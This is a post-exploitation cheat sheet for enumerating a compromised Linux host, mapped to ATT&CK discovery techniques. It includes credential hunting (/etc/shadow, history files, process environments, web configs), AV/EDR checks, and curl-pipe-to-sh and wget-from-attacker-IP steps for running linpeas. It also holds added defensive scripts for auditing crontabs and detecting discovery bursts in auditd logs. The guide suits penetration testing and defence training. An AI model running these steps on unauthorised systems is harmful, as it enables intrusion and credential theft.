Linux Enumeration

Overview

Linux post-exploitation enumeration maps the system after gaining initial access. The goal is to understand user context, system configuration, network position, and identify privilege escalation paths. Most commands use standard system utilities available on any Linux distribution — no tools to transfer.

ATT&CK Mapping

  • Tactic: TA0007 - Discovery
  • Technique: T1082 - System Information Discovery
  • Technique: T1033 - System Owner/User Discovery
  • Technique: T1016 - System Network Configuration Discovery
  • Technique: T1049 - System Network Connections Discovery
  • Technique: T1057 - Process Discovery
  • Technique: T1083 - File and Directory Discovery
  • Technique: T1087.001 - Account Discovery: Local Account
  • Technique: T1518 - Software Discovery

Prerequisites

  • Shell access on target Linux system (reverse shell, SSH, web shell)
  • For automated enumeration: ability to transfer scripts (linpeas.sh)

Techniques

Situational Awareness

# Current user and privileges
id
whoami
groups

# Hostname and OS info
hostname
uname -a
cat /etc/os-release
cat /etc/issue

# Kernel version (for kernel exploit research)
uname -r

# Architecture
uname -m

# System uptime and logged-in users
uptime
w
who
last -a | head -20

User and Group Enumeration

# All local users
cat /etc/passwd

# Users with login shells
grep -v '/nologin\|/false' /etc/passwd

# Users with UID 0 (root equivalents)
awk -F: '$3 == 0 {print $1}' /etc/passwd

# Check if /etc/shadow is readable
cat /etc/shadow 2>/dev/null

# Local groups
cat /etc/group

# Sudo privileges for current user
sudo -l 2>/dev/null

# Check for other sudoers
cat /etc/sudoers 2>/dev/null
ls -la /etc/sudoers.d/ 2>/dev/null

Network Configuration

# Network interfaces and IP addresses
ip a
ifconfig 2>/dev/null

# Routing table
ip route
route -n 2>/dev/null

# DNS configuration
cat /etc/resolv.conf

# Hosts file (may reveal internal hostnames)
cat /etc/hosts

# ARP cache (reveals other hosts on the network)
ip neigh
arp -a 2>/dev/null

# Listening ports and established connections
ss -tlnp
ss -tunap
netstat -tlnp 2>/dev/null
netstat -anp 2>/dev/null

# Firewall rules
iptables -L -n 2>/dev/null
cat /etc/iptables/rules.v4 2>/dev/null
nft list ruleset 2>/dev/null

Process Enumeration

# Running processes (all users)
ps aux
ps -ef

# Process tree
ps auxf

# Processes running as root (potential targets)
ps aux | grep '^root'

# Check for interesting processes
ps aux | grep -iE 'docker|mysql|postgres|mongo|apache|nginx|tomcat|redis'

Installed Software

# Debian/Ubuntu
dpkg -l 2>/dev/null

# RHEL/CentOS/Fedora
rpm -qa 2>/dev/null

# Check PATH for custom binaries
echo $PATH

# Find installed compilers (useful for kernel exploits)
which gcc cc g++ 2>/dev/null

# Find interpreters
which python python3 perl ruby 2>/dev/null

# Package manager history (recent installs)
cat /var/log/dpkg.log 2>/dev/null | tail -20
cat /var/log/yum.log 2>/dev/null | tail -20

Scheduled Tasks

# Current user crontab
crontab -l 2>/dev/null

# System crontabs
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /etc/cron.weekly/
ls -la /etc/cron.monthly/

# Systemd timers
systemctl list-timers --all 2>/dev/null

# Look for writable cron scripts
find /etc/cron* -writable -type f 2>/dev/null
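The writable-cron check above only catches scripts the current user can write. As an added example (not from the original page), `audit_crontab` is a hypothetical helper that parses a crontab, takes each job's program path and flags it when the file or its directory is group- or other-writable, or when the file no longer exists; the crontab it is pointed at is whatever the caller supplies.

```shell
#!/bin/sh
# Added example: audit cron entries whose program is group/other-writable, lives
# in a group/other-writable directory, or no longer exists (a dangling entry in
# a writable directory is as bad as a writable script). Handles both the
# "m h dom mon dow user cmd" form and "@reboot user cmd" shortcuts; only the
# immediate parent directory is checked, and env lines such as SHELL= are skipped.

# writable_by_others PATH -> 0 if the group or other write bit is set. Reads the
# ls mode string so the answer is the same whoever runs the audit (root can
# write anything, so test -w would be useless here).
writable_by_others() {
    mode=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    case "$mode" in
        ?????w????|????????w?) return 0 ;;
    esac
    return 1
}

# audit_crontab FILE -> prints "<reason> <user> <program>" per bad entry and
# returns 1 if anything was flagged, 0 if the file is clean.
audit_crontab() {
    # drop comments and blank lines, then emit "user<TAB>program" per job:
    # "@reboot user cmd" -> fields 2,3; "m h dom mon dow user cmd" -> fields 6,7
    out=$(grep -Ev '^[[:space:]]*(#|$)' "$1" |
        awk '$1 ~ /^@/ { print $2 "\t" $3; next }
             NF >= 7   { print $6 "\t" $7 }' |
        while IFS="$(printf '\t')" read -r user prog; do
            case "$prog" in /*) ;; *) continue ;; esac   # skip relative paths / shell words
            if [ ! -e "$prog" ]; then
                printf '%-12s %s %s\n' missing "$user" "$prog"
            elif writable_by_others "$prog"; then
                printf '%-12s %s %s\n' writable "$user" "$prog"
            elif writable_by_others "$(dirname "$prog")"; then
                printf '%-12s %s %s\n' dir-writable "$user" "$prog"
            fi
        done)
    [ -n "$out" ] && printf '%s\n' "$out"
    [ -z "$out" ]
}

# On a live host, run this against /etc/crontab and every file in /etc/cron.d/.
[ -r /etc/crontab ] && { audit_crontab /etc/crontab || echo "review the flagged entries"; }
```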

File System Enumeration

# SUID binaries (potential privesc)
find / -perm -4000 -type f 2>/dev/null

# SGID binaries
find / -perm -2000 -type f 2>/dev/null

# World-writable directories
find / -writable -type d 2>/dev/null

# World-writable files (excluding /proc and /sys)
find / -writable -type f ! -path '/proc/*' ! -path '/sys/*' 2>/dev/null

# Files owned by current user
find / -user $(whoami) -type f 2>/dev/null

# Recently modified files (last 10 minutes)
find / -mmin -10 -type f 2>/dev/null

# Capabilities set on binaries
getcap -r / 2>/dev/null

# Mounted filesystems
mount
df -h
cat /etc/fstab

Credential Hunting

# SSH keys
find / -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" -o -name "authorized_keys" 2>/dev/null
ls -la ~/.ssh/ 2>/dev/null

# History files
cat ~/.bash_history 2>/dev/null
cat ~/.zsh_history 2>/dev/null
cat ~/.mysql_history 2>/dev/null

# Configuration files with credentials
find / -name "*.conf" -o -name "*.config" -o -name "*.cfg" -o -name "*.ini" 2>/dev/null | head -30
grep -rl "password" /etc/ 2>/dev/null
grep -rl "password" /var/www/ 2>/dev/null
grep -rl "password" /opt/ 2>/dev/null

# Environment variables
env
cat /proc/*/environ 2>/dev/null

# Web application config files
cat /var/www/html/wp-config.php 2>/dev/null
cat /var/www/html/.env 2>/dev/null
find /var/www/ -name "*.php" -exec grep -l "password\|passwd\|db_pass" {} \; 2>/dev/null

# Database files
find / -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" 2>/dev/null

Defense Posture

# Check for AV/EDR
which clamd clamscan 2>/dev/null
ps aux | grep -iE 'falcon|crowd|sentinel|sophos|eset|clam|avg'

# AppArmor status
aa-status 2>/dev/null

# SELinux status
getenforce 2>/dev/null
sestatus 2>/dev/null

# Check if we're in a container
cat /proc/1/cgroup 2>/dev/null | grep -i docker
ls /.dockerenv 2>/dev/null
cat /proc/1/cgroup 2>/dev/null | grep -i lxc

# Check for audit daemon
ps aux | grep auditd
cat /etc/audit/auditd.conf 2>/dev/null
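The audit daemon these checks look for is also the source a defender uses to see this enumeration happening. Added example, not from the page: `install_rules` and `flag_discovery_bursts` are hypothetical helper names, the auditctl rules use standard auditd syntax, and the SYSCALL records in the block are constructed samples.

```shell
#!/bin/sh
# Added example: the detection side of the checks above. install_rules logs reads
# of the sensitive files this page enumerates plus every execve by a logged-in
# user (root only, not invoked here); flag_discovery_bursts then spots a session
# running many distinct discovery commands inside a short window.
install_rules() {
    auditctl -w /etc/shadow -p r -k cred-read
    auditctl -w /etc/sudoers -p r -k sudo-read
    auditctl -a always,exit -F arch=b64 -S execve -F auid>=1000 -F auid!=4294967295 -k exec
}
# Constructed sample of auditd SYSCALL records (fields trimmed for brevity):
# session 3 runs six discovery commands in 15 s; session 7 runs two, 15 min apart.
AUDIT_LOG='type=SYSCALL msg=audit(1700000000.100:101): syscall=59 success=yes auid=1000 uid=1000 ses=3 comm="id" key="exec"
type=EXECVE msg=audit(1700000000.100:101): argc=1 a0="id"
type=SYSCALL msg=audit(1700000003.200:102): syscall=59 success=yes auid=1000 uid=1000 ses=3 comm="uname" key="exec"
type=SYSCALL msg=audit(1700000007.000:103): syscall=59 success=yes auid=1000 uid=1000 ses=3 comm="ps" key="exec"
type=SYSCALL msg=audit(1700000010.500:104): syscall=59 success=yes auid=1000 uid=1000 ses=3 comm="find" key="exec"
type=SYSCALL msg=audit(1700000012.000:105): syscall=59 success=yes auid=1000 uid=1000 ses=3 comm="getcap" key="exec"
type=SYSCALL msg=audit(1700000015.000:106): syscall=59 success=yes auid=1000 uid=1000 ses=3 comm="find" key="exec"
type=SYSCALL msg=audit(1700000020.000:107): syscall=59 success=yes auid=1001 uid=1001 ses=7 comm="ps" key="exec"
type=SYSCALL msg=audit(1700000900.000:108): syscall=59 success=yes auid=1001 uid=1001 ses=7 comm="find" key="exec"'

# flag_discovery_bursts LOGTEXT THRESHOLD WINDOW_SECONDS -> one line per session
# that ran >= THRESHOLD distinct discovery commands inside one (tumbling) window.
flag_discovery_bursts() {
    printf '%s\n' "$1" | awk -v thr="$2" -v win="$3" '
    BEGIN { split("id whoami uname ps find getcap ss netstat crontab last w", d, " "); for (i in d) disc[d[i]] = 1 }
    $1 == "type=SYSCALL" && /key="exec"/ {
        t = $2; sub(/^msg=audit\(/, "", t); sub(/\..*/, "", t)   # epoch seconds
        ses = ""; auid = ""; comm = ""
        for (i = 3; i <= NF; i++) {
            if ($i ~ /^ses=/)  ses  = substr($i, 5)
            if ($i ~ /^auid=/) auid = substr($i, 6)
            if ($i ~ /^comm=/) comm = substr($i, 7, length($i) - 7)   # strip comm="..."
        }
        if (!(comm in disc)) next
        if (!(ses in ws) || t - ws[ses] > win) {        # new window: reset the set
            ws[ses] = t; cnt[ses] = 0
            for (k in seen) { split(k, p, SUBSEP); if (p[1] == ses) delete seen[k] }
        }
        if (!((ses, comm) in seen)) { seen[ses, comm] = 1; cnt[ses]++ }
        if (cnt[ses] >= thr && !(ses in done)) {
            done[ses] = 1
            printf "ses=%s auid=%s %d distinct discovery commands within %ds from %s\n", ses, auid, cnt[ses], win, ws[ses]
        }
    }'
}

flag_discovery_bursts "$AUDIT_LOG" 5 60
```

On a live host feed it `ausearch -k exec --raw` output and tune the command list and threshold to what your administrators normally run.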

Automated Enumeration

# linpeas.sh
# https://github.com/peass-ng/PEASS-ng
# Transfer to target and run
curl -sL https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or download first, then transfer
# On attacker: python3 -m http.server 8080
# On target:
wget http://<attacker_ip>:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# Save output to file
./linpeas.sh | tee linpeas_output.txt

# Run specific checks only
./linpeas.sh -s    # stealth & faster (skips time-consuming checks)
./linpeas.sh -e    # extra enumeration (takes longer)

linpeas.sh checks for SUID binaries, capabilities, sudo misconfigurations, writable paths, credential files, kernel exploits, container breakouts, and hundreds of other privilege escalation vectors. On Kali, the script is available at /usr/share/peass/linpeas/linpeas.sh.
